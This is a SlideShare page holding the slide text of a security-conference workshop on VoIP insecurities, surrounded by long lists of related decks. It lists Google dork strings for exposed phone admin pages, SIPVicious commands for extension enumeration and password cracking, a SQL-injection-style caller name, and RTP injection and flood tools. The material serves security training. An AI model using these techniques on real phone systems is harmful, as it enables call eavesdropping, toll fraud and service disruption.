SlideShare a Scribd company logo

Positive Hack Days. Gritsai. VOIP insecurities workshop

Download as PPTX, PDF
Positive Hack Days
Positive Hack Days

Участник получит представление об основе IP-телефонии, а также базовые навыки поиска уязвимостей на примере распространенных IP-PBX и абонентских устройств. Рассматриваются как типовые сетевые уязвимости, так и сложные случаи, обнаруживаемые в ходе анализа защищенности реальных сетей.

Technology
1 of 35
VOIPinsecuritiesworkshop “I just called to say I pwn you I just called to say how much I care I just called to say I own you And I mean it from the bottom of my heart” Stevie Wonder
Agenda VOIP PSTN & VOIP PSTN vs. VOIP VOIP protocols VOIP security Attacking VOIP Enumerating VOIP devices RTP attacks +demonstration SIPattacks +practice Further readings
PSTN/ Public switched telephone network
VOIP / Voice over Internet Protocol
PSTN vs. VOIP Network PSTN – Closed network VOIP – Public network(Internet) End-user devices PSTN – Simple devices VOIP – Complex devices Authentication PSTN – No mobility (Authentication by wire) VOIP – Mobility
VOIP protocols Signaling protocols Media protocols Call control and media stream use different routes
VOIP protocols: SignalingShort overview SIPSession Initiation Protocol SDPSession Description Protocol H.323H.323 MGCPMedia Gateway Control Protocol SCCPSkinny Client Control Protocol RTCPReal-time Transfer Control Protocol
VOIP protocols: Media and HybridShort overview Media RTP/SRTP Hybrid (signaling + media) IAX/IAX2
VOIP insecurities Confidentiality eavesdropping, recording, … Availability DoS, buffer overflows, … Authentication registration hijacking, Caller ID spoofing, … Fraud toll fraud, data masquerading, … SPIT (SPAM over IP Telephony) voice phishing, unsolicited calling, …
VOIP insecuritiesTopics for today Enumeration of VOIP devices search engines port scanning RTP eavesdropping/recording calls inserting data into media stream DoS SIP searching extensions Caller name spoofing DoS
Enumerating VOIP devicesGoogle hacking Google hacking GHDB User manual -> request Google inurl: intitle: site:<Customer> ! Examples: Asterisk Management Portal: intitle:asterisk.management.portal web-access Cisco Phones: inurl:"NetworkConfiguration" cisco Cisco CallManager: inurl:"ccmuser/logon.asp" D-Link Phones: intitle:"D-Link DPH" "web login setting" Grandstream Phones: intitle:"Grandstream Device Configuration" password Linksys (Sipura) Phones: intitle:" SPA Configuration" PolycomSoundpoint Phones: intitle:"SoundPoint IP Configuration"
Enumerating VOIP devicesShodan [1/2] www.shodanhq.com search for domain names, ips, ports
Enumerating VOIP devicesShodan [2/2] Banner grabbing passwordlessSnom phones
Enumerating VOIP devicesnmap VOIP scanners smap svmap (sipvicious) Fyodor’s nmap -sU UDP scanning common problems
Enumerating VOIP devicesCommon ports VOIP protocols 5060-5070, 1718-1720, 2517, …. RTP ports are allocated dynamically Management protocols TCP 21-23, 80, 443, 8088, … UDP 161, 162, 69, … IANA Internet Assigned Numbers Authority grep<vendor> www.iana.org/assignments/port-numbers
RTP Real-time Transport Protocol RFC 1889 (1996) ->RFC 3550 (2003) Media over IP/UDP Packer reordering Used with signaling protocols (SIP, H.323, MGCP) RTCP (Real-time Transport Control Protocol) RTCP port =RTP port + 1
RTP Attacks Call interception Attacking layers2, 3 Decoding intercepted data Injection into call Finding RTP port Injecting media stream Denial of Service RTP flood
RTP AttacksCall interception ARP spoofing Cain & abel ettercap arpspoof (dsniff) Wireshark Telephony VOIP calls / Demo
RTP AttacksInjection: Synchronization in RTP sequence number position in media stream +=1 timestampsampling +=1 SSRCidentifying source const (random 32 bit value) payload type codec in use
RTPAttacksInjection Unencrypted deployment issues (debug) QoSissues key distribution UDP – connectionless Data requirements: SSRC timestamp, sequence number – monotonically increasing timestamp, sequence number - fuzzing
RTP AttacksInjection Finding RTP port InterceptSDP Port scan Media injection Requirements frequency codec Demo SDP || nmap rtpinsertsound not working 100%?
RTP AttacksDenial of Service Flood Low bandwidth requirements Media stream = high load Authentication - SIP and again … UDP - connectionless / Demo rtpflood
SIP Session Initiation Protocol Application layer (TCP/UDP) ASCII header SIP header ~= e-mail header URI
SIP Components UA (User agent), Proxy, Registrar, Redirect Call viaProxy Call via Redirect
SIP Attacks Using somebodies PBX Extension enumeration Bruteforce extension password Caller name spoofing Registration hijacking Denial of service Busy lines
SIPRequests INVITEindicates a client is being invited to participate in a call session BYETerminates a call and can be sent by either the caller or the callee OPTIONSQueries the capabilities of servers REGISTERRegisters the address listed in the To header field with a SIP server ACKConfirms that the client has received a final response to an INVITE request CANCELCancels any pending request more …
SIPAnswers 1хх Informational (100 Trying, 180 Ringing) 2xx Successful (200 OK, 202 Accepted) 3xx Redirection (302 Moved Temporarily) 4xx Request Failure (404 Not Found, 482 Loop Detected) 5xx Server Failure (501 Not Implemented) 6xx Global Failure (603 Decline)
basic SIP call
SIP AttacksUsing somebodies PBX PBX Extension enumeration Bruteforcing passwords Making a call Practice withSipvicious svmap <ip> svwar –e<extensions> <ip> -m<REQUEST> svcrack –u<extension> -d <dictionary> <ip> Setting up asoftphone
SIP AttacksCaller name spoofing Caller Name spoofing Softphone Practicing X-Lite Softphone–caller name spoofing Display name‘ 1=1 -- Domain ip of UA Register disable
SIP AttacksRegistration hijacking Registration hijacking INVITE to PBX Search user in Registar Registration is in Contact header: ip address Practicing with X-Lite Register settings rate
SIP AttacksDenial of Service Denial of Service No auth -> INVITE <- TRYING… <- Busy here HTTP digest -> INVITE generation/storingnonce Practice inviteflood
Further reading Set up a lab http://enablesecurity.com/resources/how-to-set-up-a-voip-lab-on-a-shoe-string/ Read and practice Hacking Exposed VoIP—Voice Over IP Security Secrets & Solutions Advanced attacks “Having fun with RTP” by kapejod “SIP home gateways under fire” by AnhängteDateien Fuzzing
QA
ggritsai@ptsecurity.ru

Recommended

Positive Hack Days. Gurzov. VOIP - Reduce Your Expenses, Increase Your Income...
Positive Hack Days. Gurzov. VOIP - Reduce Your Expenses, Increase Your Income...Positive Hack Days. Gurzov. VOIP - Reduce Your Expenses, Increase Your Income...
Positive Hack Days. Gurzov. VOIP - Reduce Your Expenses, Increase Your Income...
Positive Hack Days
 
Voice Over IP Overview w/Secuirty
Voice Over IP Overview w/SecuirtyVoice Over IP Overview w/Secuirty
Voice Over IP Overview w/Secuirty
Christopher Duffy
 
Ceh v5 module 15 hacking wireless networks
Ceh v5 module 15 hacking wireless networksCeh v5 module 15 hacking wireless networks
Ceh v5 module 15 hacking wireless networks
Vi Tính Hoàng Nam
 
Matrix Telecom Solutions: SETU VGFX - Fixed VoIP to GSM/3G-FXO-FXS Voice Gat...
Matrix Telecom Solutions: SETU VGFX - Fixed VoIP to GSM/3G-FXO-FXS Voice Gat...Matrix Telecom Solutions: SETU VGFX - Fixed VoIP to GSM/3G-FXO-FXS Voice Gat...
Matrix Telecom Solutions: SETU VGFX - Fixed VoIP to GSM/3G-FXO-FXS Voice Gat...
Matrix Comsec
 
Voice over IP
Voice over IPVoice over IP
Voice over IP
Togis UAB Ltd
 
Ceh v5 module 04 enumeration
Ceh v5 module 04 enumerationCeh v5 module 04 enumeration
Ceh v5 module 04 enumeration
Vi Tính Hoàng Nam
 
VoIPER: Smashing the VoIP stack while you sleep
VoIPER: Smashing the VoIP stack while you sleepVoIPER: Smashing the VoIP stack while you sleep
VoIPER: Smashing the VoIP stack while you sleep
guestad6e9e
 
Matrix Telecom Solutions: SETU VGB - Fixed VoIP to GSM/3G-ISDN BRI Gateway
Matrix Telecom Solutions: SETU VGB - Fixed VoIP to GSM/3G-ISDN BRI GatewayMatrix Telecom Solutions: SETU VGB - Fixed VoIP to GSM/3G-ISDN BRI Gateway
Matrix Telecom Solutions: SETU VGB - Fixed VoIP to GSM/3G-ISDN BRI Gateway
Matrix Comsec
 

Recommended

Positive Hack Days. Gurzov. VOIP - Reduce Your Expenses, Increase Your Income...
Positive Hack Days. Gurzov. VOIP - Reduce Your Expenses, Increase Your Income...Positive Hack Days. Gurzov. VOIP - Reduce Your Expenses, Increase Your Income...
Positive Hack Days. Gurzov. VOIP - Reduce Your Expenses, Increase Your Income...
Positive Hack Days
 
Voice Over IP Overview w/Secuirty
Voice Over IP Overview w/SecuirtyVoice Over IP Overview w/Secuirty
Voice Over IP Overview w/Secuirty
Christopher Duffy
 
Ceh v5 module 15 hacking wireless networks
Ceh v5 module 15 hacking wireless networksCeh v5 module 15 hacking wireless networks
Ceh v5 module 15 hacking wireless networks
Vi Tính Hoàng Nam
 
Matrix Telecom Solutions: SETU VGFX - Fixed VoIP to GSM/3G-FXO-FXS Voice Gat...
Matrix Telecom Solutions: SETU VGFX - Fixed VoIP to GSM/3G-FXO-FXS Voice Gat...Matrix Telecom Solutions: SETU VGFX - Fixed VoIP to GSM/3G-FXO-FXS Voice Gat...
Matrix Telecom Solutions: SETU VGFX - Fixed VoIP to GSM/3G-FXO-FXS Voice Gat...
Matrix Comsec
 
Voice over IP
Voice over IPVoice over IP
Voice over IP
Togis UAB Ltd
 
Ceh v5 module 04 enumeration
Ceh v5 module 04 enumerationCeh v5 module 04 enumeration
Ceh v5 module 04 enumeration
Vi Tính Hoàng Nam
 
VoIPER: Smashing the VoIP stack while you sleep
VoIPER: Smashing the VoIP stack while you sleepVoIPER: Smashing the VoIP stack while you sleep
VoIPER: Smashing the VoIP stack while you sleep
guestad6e9e
 
Matrix Telecom Solutions: SETU VGB - Fixed VoIP to GSM/3G-ISDN BRI Gateway
Matrix Telecom Solutions: SETU VGB - Fixed VoIP to GSM/3G-ISDN BRI GatewayMatrix Telecom Solutions: SETU VGB - Fixed VoIP to GSM/3G-ISDN BRI Gateway
Matrix Telecom Solutions: SETU VGB - Fixed VoIP to GSM/3G-ISDN BRI Gateway
Matrix Comsec
 
How to hack a telecommunication company and stay alive. Sergey Gordeychik
How to hack a telecommunication company and stay alive. Sergey GordeychikHow to hack a telecommunication company and stay alive. Sergey Gordeychik
How to hack a telecommunication company and stay alive. Sergey Gordeychik
Positive Hack Days
 
VoIP Security 101 what you need to know
VoIP Security 101 what you need to knowVoIP Security 101 what you need to know
VoIP Security 101 what you need to know
Eric Klein
 
OST Market - Hybrid Case Histories
OST Market - Hybrid Case HistoriesOST Market - Hybrid Case Histories
OST Market - Hybrid Case Histories
Roberto Galoppini
 
Protect your IPPBX against VOIP attacks
Protect your IPPBX against VOIP attacksProtect your IPPBX against VOIP attacks
Protect your IPPBX against VOIP attacks
Rohan Fernandes
 
Encrypted Voice Communications
Encrypted Voice CommunicationsEncrypted Voice Communications
Encrypted Voice Communications
sbwahid
 
Voip security
Voip securityVoip security
Voip security
Shethwala Ridhvesh
 
Hacking Trust Relationships Between SIP Gateways
Hacking Trust Relationships Between SIP GatewaysHacking Trust Relationships Between SIP Gateways
Hacking Trust Relationships Between SIP Gateways
Fatih Ozavci
 
VoIP security: Implementation and Protocol Problems
VoIP security: Implementation and Protocol ProblemsVoIP security: Implementation and Protocol Problems
VoIP security: Implementation and Protocol Problems
seanhn
 
BlackHat Hacking - Hacking VoIP.
BlackHat Hacking - Hacking VoIP.BlackHat Hacking - Hacking VoIP.
BlackHat Hacking - Hacking VoIP.
Sumutiu Marius
 
Defcon 22-fatih-ozavci-vo ip-wars-attack-of-the-cisco-phones
Defcon 22-fatih-ozavci-vo ip-wars-attack-of-the-cisco-phonesDefcon 22-fatih-ozavci-vo ip-wars-attack-of-the-cisco-phones
Defcon 22-fatih-ozavci-vo ip-wars-attack-of-the-cisco-phones
Priyanka Aash
 
Ceh v5 module 12 web application vulnerabilities
Ceh v5 module 12 web application vulnerabilitiesCeh v5 module 12 web application vulnerabilities
Ceh v5 module 12 web application vulnerabilities
Vi Tính Hoàng Nam
 
#MoreCrypto : Introduction to TLS
#MoreCrypto : Introduction to TLS#MoreCrypto : Introduction to TLS
#MoreCrypto : Introduction to TLS
Olle E Johansson
 
Forti wifi
Forti wifiForti wifi
Forti wifi
Lan & Wan Solutions
 
*astTECS - IP PBX_2018
*astTECS - IP PBX_2018*astTECS - IP PBX_2018
*astTECS - IP PBX_2018
Salman Muhammed Ashraf
 
Ceh v5 module 11 hacking webservers
Ceh v5 module 11 hacking webserversCeh v5 module 11 hacking webservers
Ceh v5 module 11 hacking webservers
Vi Tính Hoàng Nam
 
Defcon 22-weston-hecker-burner-phone-ddos
Defcon 22-weston-hecker-burner-phone-ddosDefcon 22-weston-hecker-burner-phone-ddos
Defcon 22-weston-hecker-burner-phone-ddos
Priyanka Aash
 
No More Fraud Cluecon2014
No More Fraud Cluecon2014No More Fraud Cluecon2014
No More Fraud Cluecon2014
Flavio Eduardo de Andrade Goncalves
 
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
Fatih Ozavci
 
Brst – Border Router Security Tool
Brst – Border Router Security ToolBrst – Border Router Security Tool
Brst – Border Router Security Tool
tleroy0928
 
Positive Hack Days. Christopher Gould. Head in the Clouds…Can we overcome sec...
Positive Hack Days. Christopher Gould. Head in the Clouds…Can we overcome sec...Positive Hack Days. Christopher Gould. Head in the Clouds…Can we overcome sec...
Positive Hack Days. Christopher Gould. Head in the Clouds…Can we overcome sec...
Positive Hack Days
 
Анализ работы антивирусных лабораторий
Анализ работы антивирусных лабораторийАнализ работы антивирусных лабораторий
Анализ работы антивирусных лабораторий
Positive Hack Days
 
Hacking PBXs for international revenue share fraud
Hacking PBXs for international revenue share fraudHacking PBXs for international revenue share fraud
Hacking PBXs for international revenue share fraud
cVidya Networks
 

More Related Content

What's hot

How to hack a telecommunication company and stay alive. Sergey Gordeychik
How to hack a telecommunication company and stay alive. Sergey GordeychikHow to hack a telecommunication company and stay alive. Sergey Gordeychik
How to hack a telecommunication company and stay alive. Sergey Gordeychik
Positive Hack Days
 
Hacking Trust Relationships Between SIP Gateways
Hacking Trust Relationships Between SIP GatewaysHacking Trust Relationships Between SIP Gateways
Hacking Trust Relationships Between SIP Gateways
Fatih Ozavci
 
Defcon 22-fatih-ozavci-vo ip-wars-attack-of-the-cisco-phones
Defcon 22-fatih-ozavci-vo ip-wars-attack-of-the-cisco-phonesDefcon 22-fatih-ozavci-vo ip-wars-attack-of-the-cisco-phones
Defcon 22-fatih-ozavci-vo ip-wars-attack-of-the-cisco-phones
Priyanka Aash
 
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
Fatih Ozavci
 

What's hot (19)

How to hack a telecommunication company and stay alive. Sergey Gordeychik
How to hack a telecommunication company and stay alive. Sergey GordeychikHow to hack a telecommunication company and stay alive. Sergey Gordeychik
How to hack a telecommunication company and stay alive. Sergey Gordeychik
 
VoIP Security 101 what you need to know
VoIP Security 101 what you need to knowVoIP Security 101 what you need to know
VoIP Security 101 what you need to know
 
OST Market - Hybrid Case Histories
OST Market - Hybrid Case HistoriesOST Market - Hybrid Case Histories
OST Market - Hybrid Case Histories
 
Protect your IPPBX against VOIP attacks
Protect your IPPBX against VOIP attacksProtect your IPPBX against VOIP attacks
Protect your IPPBX against VOIP attacks
 
Encrypted Voice Communications
Encrypted Voice CommunicationsEncrypted Voice Communications
Encrypted Voice Communications
 
Voip security
Voip securityVoip security
Voip security
 
Hacking Trust Relationships Between SIP Gateways
Hacking Trust Relationships Between SIP GatewaysHacking Trust Relationships Between SIP Gateways
Hacking Trust Relationships Between SIP Gateways
 
VoIP security: Implementation and Protocol Problems
VoIP security: Implementation and Protocol ProblemsVoIP security: Implementation and Protocol Problems
VoIP security: Implementation and Protocol Problems
 
BlackHat Hacking - Hacking VoIP.
BlackHat Hacking - Hacking VoIP.BlackHat Hacking - Hacking VoIP.
BlackHat Hacking - Hacking VoIP.
 
Defcon 22-fatih-ozavci-vo ip-wars-attack-of-the-cisco-phones
Defcon 22-fatih-ozavci-vo ip-wars-attack-of-the-cisco-phonesDefcon 22-fatih-ozavci-vo ip-wars-attack-of-the-cisco-phones
Defcon 22-fatih-ozavci-vo ip-wars-attack-of-the-cisco-phones
 
Ceh v5 module 12 web application vulnerabilities
Ceh v5 module 12 web application vulnerabilitiesCeh v5 module 12 web application vulnerabilities
Ceh v5 module 12 web application vulnerabilities
 
#MoreCrypto : Introduction to TLS
#MoreCrypto : Introduction to TLS#MoreCrypto : Introduction to TLS
#MoreCrypto : Introduction to TLS
 
Forti wifi
Forti wifiForti wifi
Forti wifi
 
*astTECS - IP PBX_2018
*astTECS - IP PBX_2018*astTECS - IP PBX_2018
*astTECS - IP PBX_2018
 
Ceh v5 module 11 hacking webservers
Ceh v5 module 11 hacking webserversCeh v5 module 11 hacking webservers
Ceh v5 module 11 hacking webservers
 
Defcon 22-weston-hecker-burner-phone-ddos
Defcon 22-weston-hecker-burner-phone-ddosDefcon 22-weston-hecker-burner-phone-ddos
Defcon 22-weston-hecker-burner-phone-ddos
 
No More Fraud Cluecon2014
No More Fraud Cluecon2014No More Fraud Cluecon2014
No More Fraud Cluecon2014
 
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
 
Brst – Border Router Security Tool
Brst – Border Router Security ToolBrst – Border Router Security Tool
Brst – Border Router Security Tool
 

Viewers also liked

Positive Hack Days. Christopher Gould. Head in the Clouds…Can we overcome sec...
Positive Hack Days. Christopher Gould. Head in the Clouds…Can we overcome sec...Positive Hack Days. Christopher Gould. Head in the Clouds…Can we overcome sec...
Positive Hack Days. Christopher Gould. Head in the Clouds…Can we overcome sec...
Positive Hack Days
 
Анализ работы антивирусных лабораторий
Анализ работы антивирусных лабораторийАнализ работы антивирусных лабораторий
Анализ работы антивирусных лабораторий
Positive Hack Days
 
Light And Dark Side Of Code Instrumentation
Light And Dark Side Of Code InstrumentationLight And Dark Side Of Code Instrumentation
Light And Dark Side Of Code Instrumentation
Positive Hack Days
 

Viewers also liked (7)

Positive Hack Days. Christopher Gould. Head in the Clouds…Can we overcome sec...
Positive Hack Days. Christopher Gould. Head in the Clouds…Can we overcome sec...Positive Hack Days. Christopher Gould. Head in the Clouds…Can we overcome sec...
Positive Hack Days. Christopher Gould. Head in the Clouds…Can we overcome sec...
 
Анализ работы антивирусных лабораторий
Анализ работы антивирусных лабораторийАнализ работы антивирусных лабораторий
Анализ работы антивирусных лабораторий
 
Hacking PBXs for international revenue share fraud
Hacking PBXs for international revenue share fraudHacking PBXs for international revenue share fraud
Hacking PBXs for international revenue share fraud
 
Light And Dark Side Of Code Instrumentation
Light And Dark Side Of Code InstrumentationLight And Dark Side Of Code Instrumentation
Light And Dark Side Of Code Instrumentation
 
Hacking SIP Like a Boss!
Hacking SIP Like a Boss!Hacking SIP Like a Boss!
Hacking SIP Like a Boss!
 
Бинарный анализ с декомпиляцией и LLVM
Бинарный анализ с декомпиляцией и LLVMБинарный анализ с декомпиляцией и LLVM
Бинарный анализ с декомпиляцией и LLVM
 
Cyber fraud in banks
Cyber fraud in banksCyber fraud in banks
Cyber fraud in banks
 

Similar to Positive Hack Days. Gritsai. VOIP insecurities workshop

Introduction to VoIP using SIP
Introduction to VoIP using SIPIntroduction to VoIP using SIP
Introduction to VoIP using SIP
Kundan Singh
 
Voice over internet_protocol
Voice over internet_protocolVoice over internet_protocol
Voice over internet_protocol
ammugowri
 
1 Vo Ip Overview
1 Vo Ip Overview1 Vo Ip Overview
1 Vo Ip Overview
Mayank Vora
 
1 Vo I P Overview
1 Vo I P Overview1 Vo I P Overview
1 Vo I P Overview
Mayank Vora
 
Voice over IP: Issues and Protocols
Voice over IP: Issues and ProtocolsVoice over IP: Issues and Protocols
Voice over IP: Issues and Protocols
Videoguy
 
Sinnreich Henry Johnston Alan Pt 3
Sinnreich Henry Johnston Alan Pt 3Sinnreich Henry Johnston Alan Pt 3
Sinnreich Henry Johnston Alan Pt 3
Carl Ford
 

Similar to Positive Hack Days. Gritsai. VOIP insecurities workshop (20)

IP and VoIP Fundamentals
IP and VoIP FundamentalsIP and VoIP Fundamentals
IP and VoIP Fundamentals
 
Introduction to VoIP, RTP and SIP
Introduction to VoIP, RTP and SIP Introduction to VoIP, RTP and SIP
Introduction to VoIP, RTP and SIP
 
VOIP
VOIPVOIP
VOIP
 
Introduction to VoIP using SIP
Introduction to VoIP using SIPIntroduction to VoIP using SIP
Introduction to VoIP using SIP
 
Fact sheet sip v1
Fact sheet sip v1Fact sheet sip v1
Fact sheet sip v1
 
Dalton Jim
Dalton JimDalton Jim
Dalton Jim
 
Voice over internet_protocol
Voice over internet_protocolVoice over internet_protocol
Voice over internet_protocol
 
SIP in action Itexpo West
SIP in action Itexpo WestSIP in action Itexpo West
SIP in action Itexpo West
 
Matrix Telecom Solutions: SETU VFXTH - Fixed VoIP to FXO-FXS Gateways
Matrix Telecom Solutions: SETU VFXTH - Fixed VoIP to FXO-FXS GatewaysMatrix Telecom Solutions: SETU VFXTH - Fixed VoIP to FXO-FXS Gateways
Matrix Telecom Solutions: SETU VFXTH - Fixed VoIP to FXO-FXS Gateways
 
Session Initiation Protocol
Session Initiation ProtocolSession Initiation Protocol
Session Initiation Protocol
 
1 Vo Ip Overview
1 Vo Ip Overview1 Vo Ip Overview
1 Vo Ip Overview
 
1 Vo I P Overview
1 Vo I P Overview1 Vo I P Overview
1 Vo I P Overview
 
SBC: Do I really need it?
SBC: Do I really need it?SBC: Do I really need it?
SBC: Do I really need it?
 
Voice over IP: Issues and Protocols
Voice over IP: Issues and ProtocolsVoice over IP: Issues and Protocols
Voice over IP: Issues and Protocols
 
SIP for geeks
SIP for geeksSIP for geeks
SIP for geeks
 
At610 shared by voip.com.vn
At610 shared by voip.com.vnAt610 shared by voip.com.vn
At610 shared by voip.com.vn
 
VoIP on LTE -packet Filter
VoIP on LTE -packet FilterVoIP on LTE -packet Filter
VoIP on LTE -packet Filter
 
Matrix Telecom Solutions: SETU VTEP - Fixed VoIP to T1/E1 PRI Gateway
Matrix Telecom Solutions: SETU VTEP - Fixed VoIP to T1/E1 PRI GatewayMatrix Telecom Solutions: SETU VTEP - Fixed VoIP to T1/E1 PRI Gateway
Matrix Telecom Solutions: SETU VTEP - Fixed VoIP to T1/E1 PRI Gateway
 
Sinnreich Henry Johnston Alan Pt 3
Sinnreich Henry Johnston Alan Pt 3Sinnreich Henry Johnston Alan Pt 3
Sinnreich Henry Johnston Alan Pt 3
 
Introduction To SIP
Introduction To SIPIntroduction To SIP
Introduction To SIP
 

More from Positive Hack Days

Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»
Positive Hack Days
 
Эвристические методы защиты приложений
Эвристические методы защиты приложенийЭвристические методы защиты приложений
Эвристические методы защиты приложений
Positive Hack Days
 
От экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летОт экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 лет
Positive Hack Days
 
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиУязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Positive Hack Days
 
Требования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОТребования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПО
Positive Hack Days
 
Формальная верификация кода на языке Си
Формальная верификация кода на языке СиФормальная верификация кода на языке Си
Формальная верификация кода на языке Си
Positive Hack Days
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET Core
Positive Hack Days
 

More from Positive Hack Days (20)

Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesИнструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release Notes
 
Как мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerКак мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows Docker
 
Типовая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesТиповая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive Technologies
 
Аналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikАналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + Qlik
 
Использование анализатора кода SonarQube
Использование анализатора кода SonarQubeИспользование анализатора кода SonarQube
Использование анализатора кода SonarQube
 
Развитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityРазвитие сообщества Open DevOps Community
Развитие сообщества Open DevOps Community
 
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
 
Автоматизация построения правил для Approof
Автоматизация построения правил для ApproofАвтоматизация построения правил для Approof
Автоматизация построения правил для Approof
 
Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»
 
Формальные методы защиты приложений
Формальные методы защиты приложенийФормальные методы защиты приложений
Формальные методы защиты приложений
 
Эвристические методы защиты приложений
Эвристические методы защиты приложенийЭвристические методы защиты приложений
Эвристические методы защиты приложений
 
Теоретические основы Application Security
Теоретические основы Application SecurityТеоретические основы Application Security
Теоретические основы Application Security
 
От экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летОт экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 лет
 
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиУязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на грабли
 
Требования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОТребования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПО
 
Формальная верификация кода на языке Си
Формальная верификация кода на языке СиФормальная верификация кода на языке Си
Формальная верификация кода на языке Си
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET Core
 
SOC для КИИ: израильский опыт
SOC для КИИ: израильский опытSOC для КИИ: израильский опыт
SOC для КИИ: израильский опыт
 
Honeywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterHoneywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services Center
 
Credential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиCredential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атаки
 

Recently uploaded

From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 

Recently uploaded (20)

Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
